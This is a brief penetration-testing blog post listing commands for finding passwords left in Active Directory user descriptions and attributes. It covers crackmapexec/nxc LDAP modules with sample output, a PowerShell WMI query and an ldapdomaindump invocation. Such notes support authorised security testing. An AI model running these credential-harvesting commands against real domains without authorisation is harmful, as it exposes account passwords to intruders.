PenTest – Password – AD User Comment

| 3 janvier 2024 | Non classé | Aucun commentaire

There are 3-4 fields that seem to be common in most Active Directory schemas: UserPasswordUnixUserPasswordunicodePwd and msSFU30Password.

  • Password in User Description 
    crackmapexec ldap domain.lab -u 'username' -p 'password' -M user-desc
crackmapexec ldap 10.0.2.11 -u 'username' -p 'password' --kdcHost 10.0.2.11 -M get-desc-users
GET-DESC... 10.0.2.11       389    dc01    [+] Found following users: 
GET-DESC... 10.0.2.11       389    dc01    User: Guest description: Built-in account for guest access to the computer/domain
GET-DESC... 10.0.2.11       389    dc01    User: krbtgt description: Key Distribution Center Service Account

     

  • Get unixUserPassword attribute from all users in ldap 
    nxc ldap 10.10.10.10 -u user -p pass -M get-unixUserPassword -M getUserPassword

     

  • Native Powershell command 
    Get-WmiObject -Class Win32_UserAccount -Filter "Domain='COMPANYDOMAIN' AND Disabled='False'" | Select Name, Domain, Status, LocalAccount, AccountType, Lockout, PasswordRequired,PasswordChangeable, Description, SID

     

  • Dump the Active Directory and grep the content. 
    ldapdomaindump -u 'DOMAIN\john' -p MyP@ssW0rd 10.10.10.10 -o ~/Documents/AD_DUMP/

About The Author

Add a Comment

Votre adresse e-mail ne sera pas publiée. Les champs obligatoires sont indiqués avec *